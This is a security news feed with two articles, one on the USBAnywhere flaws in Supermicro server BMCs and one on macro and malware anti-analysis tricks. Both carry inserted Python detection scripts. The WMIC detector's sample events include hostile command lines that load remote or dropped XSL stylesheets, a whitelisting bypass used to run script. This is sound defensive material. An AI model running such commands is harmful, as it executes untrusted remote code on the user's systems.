Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/3wCw5XE352c/

Enjoy the holiday weekend, America? Well-rested? Good. Supermicro server boards can be remotely hijacked

Tens of thousands of servers around the world are believed to be hosting a vulnerability that would allow an attacker to remotely commandeer them.

The team at Eclypsium says it has discovered a set of flaws it refers to as USBAnywhere that, when exploited, would potentially allow an attacker to take over the baseboard management controller (BMC) for three different models of server boards: the X9, X10, and X11.

BMCs are designed to be a sort of always-on, remotely accessible “computer within the computer” that allows admins to connect to a server over the network and perform critical maintenance tasks, like updating the OS or firmware.

Ideally, BMCs are locked down within the network in order to prevent access by anyone outside of the company. In some cases, larger companies even opt to use their own BMC firmware that is fine-tuned for their data centers and applications.

In a few cases, however, those BMCs are left open to the internet and can be managed over a web interface – usually very easily since they aren’t typically designed with security in mind. Here is where the vulnerabilities discovered by Eclypsium come in.

The target of the attack is the virtual media application that Supermicro uses for its BMC management console. This application allows admins to remotely mount images as USB devices, a useful tool to manage servers but also a security liability.

“This means attackers can attack the server in the same way as if they had physical access to a USB port, such as loading a new operating system image or using a keyboard and mouse to modify the server, implant malware, or even disable the device entirely,” Eclypsium said.

“The combination of easy access and straightforward attack avenues can allow unsophisticated attackers to remotely attack some of an organization’s most valuable assets.”

The team found four different flaws within the virtual media service (on TCP port 623) of the BMC’s web control interface.

They included the use of plaintext authentication and unauthenticated network traffic, as well as weak encryption and an authentication bypass flaw in the X10 and X11 platforms that allows new clients on the virtual media service to run with the old client’s permissions.

According to Eclypsium, the easiest way to attack the virtual media flaws is to find a server with the default login or brute-force an easily guessed login. In other cases, the flaws would have to be targeted.

“If a valid administrator had used virtual media since the BMC was last powered off, the authentication bypass vulnerability would allow an attacker to connect even without the proper username and password,” the report explains.

“Given that BMCs are intended to be always available, it is particularly rare for a BMC to be powered off or reset. As a result, the authentication bypass vulnerability is likely to be applicable unless the server has been physically unplugged or the building loses power.”

What’s worse, Eclypsium believes that tens of thousands of servers contain this vulnerability and are open to the internet. A quick Shodan search on port 623 turned up 47,339 different BMCs around the world.
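As an added illustration (this is not code from the Register article or from Eclypsium), here is a small Python check a defender can run over firewall logs to spot connection attempts to a BMC’s virtual media port from outside the out-of-band management network. The log format, the management subnets and the assumption that TCP 443 is the BMC web interface are all constructed for the example; the TCP 623 virtual media port is the one named in the article.

```python
import ipaddress
import re
from typing import Dict, List, Optional, Union

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Management networks from which BMC access is expected. Constructed example
# ranges for this illustration; substitute your own out-of-band subnets.
MANAGEMENT_NETS = [
    ipaddress.ip_network("10.10.0.0/24"),
    ipaddress.ip_network("10.10.1.0/24"),
]

# BMC services worth watching: TCP 623 is the virtual media service named in
# the article; 443 is assumed here to be the BMC web interface.
WATCHED_PORTS = {623: "BMC virtual media service", 443: "BMC web interface"}

# Constructed firewall log lines in an iptables-style key=value format.
# These are not real traffic; the addresses are documentation ranges.
SAMPLE_LOG = """\
Sep  3 10:01:12 fw kernel: IN=eth0 OUT= SRC=10.10.0.15 DST=10.20.5.3 PROTO=TCP SPT=51122 DPT=623 SYN
Sep  3 10:02:44 fw kernel: IN=eth0 OUT= SRC=198.51.100.77 DST=10.20.5.3 PROTO=TCP SPT=40210 DPT=623 SYN
Sep  3 10:03:01 fw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=10.20.5.4 PROTO=TCP SPT=40211 DPT=443 SYN
Sep  3 10:03:30 fw kernel: IN=eth0 OUT= SRC=10.10.1.8 DST=10.20.5.4 PROTO=TCP SPT=40212 DPT=22 SYN
"""

LINE_RE = re.compile(
    r"SRC=(?P<src>\S+)\s+DST=(?P<dst>\S+)\s+PROTO=(?P<proto>\S+)\s+SPT=\d+\s+DPT=(?P<dpt>\d+)"
)


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Extract source, destination, protocol and destination port from one log line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return {
        "src": ipaddress.ip_address(m["src"]),
        "dst": ipaddress.ip_address(m["dst"]),
        "proto": m["proto"].upper(),
        "dport": int(m["dpt"]),
    }


def is_management_source(addr: Union[str, IPAddr]) -> bool:
    """True when the address falls inside one of the management networks."""
    ip = ipaddress.ip_address(addr) if isinstance(addr, str) else addr
    return any(ip in net for net in MANAGEMENT_NETS)


def find_bmc_exposures(log_text: str) -> List[Dict[str, object]]:
    """One alert per connection attempt to a watched BMC port from a non-management source."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or ev["dport"] not in WATCHED_PORTS:
            continue
        if is_management_source(ev["src"]):
            continue  # expected admin traffic from the management VLAN
        alerts.append({
            "src": str(ev["src"]),
            "dst": str(ev["dst"]),
            "proto": ev["proto"],
            "dport": ev["dport"],
            "service": WATCHED_PORTS[ev["dport"]],
        })
    return alerts


if __name__ == "__main__":
    for a in find_bmc_exposures(SAMPLE_LOG):
        print(f"ALERT {a['proto']} {a['src']} -> {a['dst']}:{a['dport']} ({a['service']})")
```

A hit from a non-management source means the BMC is reachable from somewhere it shouldn’t be, which is exactly the exposure the Shodan count above measures. The check says nothing about whether the firmware is patched, so pair it with the vendor firmware version check.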

Fortunately, there is a fix out. Eclypsium said it has already contacted Supermicro and the vendor has released an update to fix the vulnerabilities. Organizations are advised to contact their server vendor and make sure they are running the latest version of the BMC firmware. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/03/supermicro_server_flaw/

Upping the Ante on Anti-Analysis

Attackers are becoming more sophisticated in their obfuscation and anti-analysis practices to avoid detection.

As cybercriminals continue to hone their attack approaches, they are also tuning their post-intrusion models. Many modern malware tools already incorporate features for evading antivirus and other threat detection measures, but research shows that attackers are also becoming more sophisticated in their obfuscation and anti-analysis practices to avoid detection if an infiltration attempt is successful.

Based on analysis of data from Fortinet’s “Q2 2019 Threat Landscape Report,” this article examines a recent spam campaign that used novel anti-analysis and evasion techniques.

Anatomy of a Spam Attack
Many modern malware tools include features for evading antivirus and other threat-detection measures. Examples include routines that enable the malware to detect when it is running within a sandbox environment, functions for disabling security tools on an infected system, and the use of junk data to make disassembly harder. 

A good example of how adversaries are tweaking these anti-analysis techniques can be found in a macro that was used in a major spam campaign in Japan last quarter. This campaign involved a phishing email with a weaponized Excel document attached that contained a malicious macro. Our analysis showed the macro had attributes for disabling security tools, executing commands arbitrarily, and causing memory problems — and also ensuring that it would run only on Japanese systems. 

The macro used in the Japanese spam campaign, like much other malicious software, was designed to look for certain Excel-specific variables at multiple points during execution to ensure it was running within an Office Excel environment and not in an emulator. One Excel property that it looked for in particular — the xlDate variable — was something that we haven’t observed before in other malware. Interestingly, the variable appears to be undocumented in Microsoft’s documentation — at least, we were unable to find it.

An example of anti-analysis used by the macro. Few macros actually check for Excel-specific variables such as xlXmlExportValidationFailed. In so doing, the authors have ensured that the macro is only executed within an Office Excel environment. This means that macro emulators may fail to detect it if they do not properly emulate specific Excel variables.
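As an added example (not Fortinet’s code and not the macro from the campaign), the Python below does a first-pass static triage of VBA source: it pulls out references to Excel-only xl* constants such as the xlDate and xlXmlExportValidationFailed checks described above, counts how many of them sit in conditional statements, and flags a few common environment probes. The sample macro is constructed to exercise the detector and contains only the checks themselves; the weights and threshold are arbitrary choices for the example.

```python
import re
from typing import Dict, List

# Constructed sample VBA for the detector. It contains only the Excel
# environment checks the article describes and no other behaviour.
SAMPLE_MACRO = """\
' constructed sample, not the campaign macro
Sub Auto_Open()
    If Application.Name <> "Microsoft Excel" Then Exit Sub
    If xlXmlExportValidationFailed <> 2 Then Exit Sub
    Dim d As Long
    d = xlDate
    If d = 0 Then Exit Sub
    MsgBox "environment looks real"
End Sub
"""

# Excel enumeration constants are named xl<UpperCase>...; an emulator that does
# not define them evaluates these checks differently from real Excel.
XL_CONST_RE = re.compile(r"\bxl[A-Z][A-Za-z0-9]*\b")
# Common host-environment probes used to tell Excel apart from a sandbox.
APP_PROBE_RE = re.compile(r"\bApplication\.(Name|Version|UserName|OperatingSystem|Visible)\b", re.I)
ENV_PROBE_RE = re.compile(r"\bEnviron\s*\(", re.I)
CONDITIONAL_RE = re.compile(r"(If|ElseIf|Select Case|While|Do While)\b", re.I)


def triage_macro(source: str) -> Dict[str, object]:
    """Score VBA source for Excel-specific anti-analysis checks."""
    constants = set()
    conditional_hits = 0
    app_probes = 0
    env_probes = 0
    for raw in source.splitlines():
        line = raw.strip()
        if line.startswith("'"):  # VBA comment, ignore
            continue
        found = XL_CONST_RE.findall(line)
        constants.update(found)
        # A constant inside a condition is the emulator-check pattern; weight it higher.
        if found and CONDITIONAL_RE.match(line):
            conditional_hits += 1
        app_probes += len(APP_PROBE_RE.findall(line))
        env_probes += len(ENV_PROBE_RE.findall(line))
    score = 2 * conditional_hits + app_probes + env_probes  # arbitrary weights for the example
    return {
        "excel_constants": sorted(constants),
        "conditional_constant_checks": conditional_hits,
        "application_probes": app_probes,
        "environ_probes": env_probes,
        "score": score,
        "suspicious": score >= 3,  # arbitrary threshold for the example
    }


if __name__ == "__main__":
    for key, value in triage_macro(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

Feed it the extracted VBA (olevba or a similar tool gets you the source from the document) and use the score to decide which attachments go to a full Excel instance rather than a bare emulator; a macro that branches on xl* constants is exactly the kind an emulator without those variables will misjudge.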

The use of such anti-analysis techniques, though nothing new, appears to be growing. In June, for example, security researchers found a new variant of the Dridex banking Trojan that evaded several traditional antivirus tools by using 64-bit DLLs with file names of legitimate Windows executables. The file names and associated hashes changed each time the victim logged in, making it hard for signature-based antivirus tools to spot the malware on infected host systems. This Dridex variant also took advantage of a known weakness in the Windows Management Instrumentation Command-line (WMIC) utility to bypass application whitelisting measures and execute malicious VBS code embedded within an XSL file.
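As an added example (not from Fortinet’s report and not the Dridex sample), here is a Python detection over constructed process-creation events for the WMIC stylesheet abuse described above: it flags wmic.exe invocations where /format: points at a stylesheet given as a file path, URL or .xsl name rather than one of WMIC’s built-in format names, and notes when the parent process is an Office application. The event fields and the list of built-in format names are assumptions made for the example.

```python
import re
from typing import Dict, List, Optional

# Format names that WMIC ships with (assumed list for this example); /format:<name>
# with one of these is ordinary use and should not alert.
BUILTIN_FORMATS = {
    "list", "table", "csv", "hform", "htable", "mof",
    "rawxml", "textvaluelist", "value", "xml",
}
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}

FORMAT_RE = re.compile(r'/format\s*:\s*"?(?P<target>[^\s"]+)', re.IGNORECASE)

# Constructed process-creation events (fields modelled on a typical EDR/Sysmon
# record); these are not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic os get /format:list", "parent": "cmd.exe"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic process get /format:"C:\Users\Public\update.xsl"', "parent": "EXCEL.EXE"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic os get /format:https://example.invalid/update.xsl", "parent": "powershell.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe /format:x.xsl", "parent": "explorer.exe"},
]


def stylesheet_target(cmdline: str) -> Optional[str]:
    """Return the value passed to /format:, or None when the switch is absent."""
    m = FORMAT_RE.search(cmdline)
    return m["target"] if m else None


def is_custom_stylesheet(target: str) -> bool:
    """True when the /format: value is a path, URL or .xsl file rather than a built-in name."""
    t = target.lower()
    if t in BUILTIN_FORMATS:
        return False
    return t.endswith(".xsl") or "://" in t or "\\" in t or "/" in t


def detect_wmic_xsl(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Alert on wmic.exe loading a caller-supplied stylesheet."""
    alerts = []
    for ev in events:
        if not ev["image"].lower().endswith("\\wmic.exe"):
            continue
        target = stylesheet_target(ev["cmdline"])
        if target is None or not is_custom_stylesheet(target):
            continue
        alerts.append({
            "target": target,
            "parent": ev["parent"],
            # An Office parent matches the phishing-attachment delivery in the article.
            "office_parent": ev["parent"].upper() in OFFICE_PARENTS,
            "reason": "wmic.exe invoked with a non-built-in /format: stylesheet",
        })
    return alerts


if __name__ == "__main__":
    for a in detect_wmic_xsl(SAMPLE_EVENTS):
        print(f"ALERT parent={a['parent']} office={a['office_parent']} target={a['target']}")
```

The rule deliberately keys on the stylesheet source rather than on the file extension alone, since the stylesheet need not end in .xsl; an Office parent raises the priority because that is the delivery path in the spam campaign described above.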

Multiple reports of downloaders with sophisticated, built-in defense-evasion techniques also appeared in the second quarter. One example is AndroMut, a downloader that the Russian-speaking TA505 group used in a campaign targeting individuals working at financial companies. AndroMut’s anti-analysis features include sandbox and emulator checks, as well as checks for mouse movement and debuggers. At least two other downloaders — Brushaloader and a new version of JasperLoader — were reported in the second quarter as having similarly advanced evasion mechanisms.

Best Practices
Here are five best practices you can implement to build or expand on a multilayered defense strategy.

  1. Add this anti-analysis trend into your current risk analysis strategy. Your IT team needs to know about this risk and consider options, such as storing system backups off-site, putting redundant systems in place, and being able to lock down segments of the network when an attack is detected.
  2. Inventory all critical assets and services across your network. Expand your efforts to identify and patch vulnerable systems, replace older systems that are no longer supported, or enhance compensating security tools. This will likely involve implementing some sort of asset-tracking and management solution.
  3. Segment your networks. Segmentation can be used for a variety of security purposes. For example, you can keep Internet of Things (IoT) and similar devices automatically separated from your production network until they can be properly secured. This should also be tied to device authentication and network access control at access points. This enables you to identify and authenticate devices, manage access, inspect traffic, and then assign it to secure network segments — all at wire speed. You also need to set up checkpoints to monitor traffic that passes between network segments looking for anomalous behaviors, malware, and other sophisticated attacks.
  4. Inspect encrypted traffic. It takes 50 to 100 times more processing power than conventional traffic to perform deep inspection of encrypted traffic and unstructured data, such as the raw data produced by many IoT devices. Unfortunately, most security devices may need to be upgraded to do this.
  5. Automate event correlation. In today’s high-performance environments, you can’t afford to hand-correlate threat data to detect threats or respond at anything less than machine speeds. To address this issue, you must be able to automatically collect and correlate real-time threat intelligence to identify and stop an attack before it can deliver its payload or extract the data it’s looking for.

Future-Forward Security
Malicious actors aren’t only creating new ways to access your network but are also developing new ways to remain undetected once in and do as they please for as long as they like. By understanding the risks and putting the right defenses in place, your organization can defend itself against not only these latest attack trends but also those that have yet to be devised.

Toward that end, FortiGuard creates adversary playbooks based on its role in the Cyber Threat Alliance. These playbooks describe the tools, techniques, and steps that adversaries use to achieve their goals, so that IT security teams can disrupt malicious actors more systematically. The most recent playbook dissects Zegost, an info-stealer used recently against a Chinese government agency, and is available here.

Derek Manky formulates security strategy with more than 15 years of cyber security experience behind him. His ultimate goal is to make a positive impact in the global war on cybercrime. Manky provides thought leadership to industry, and has presented research and strategy …

Article source: https://www.darkreading.com/risk/upping-the-ante-on-anti-analysis/a/d-id/1335648?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple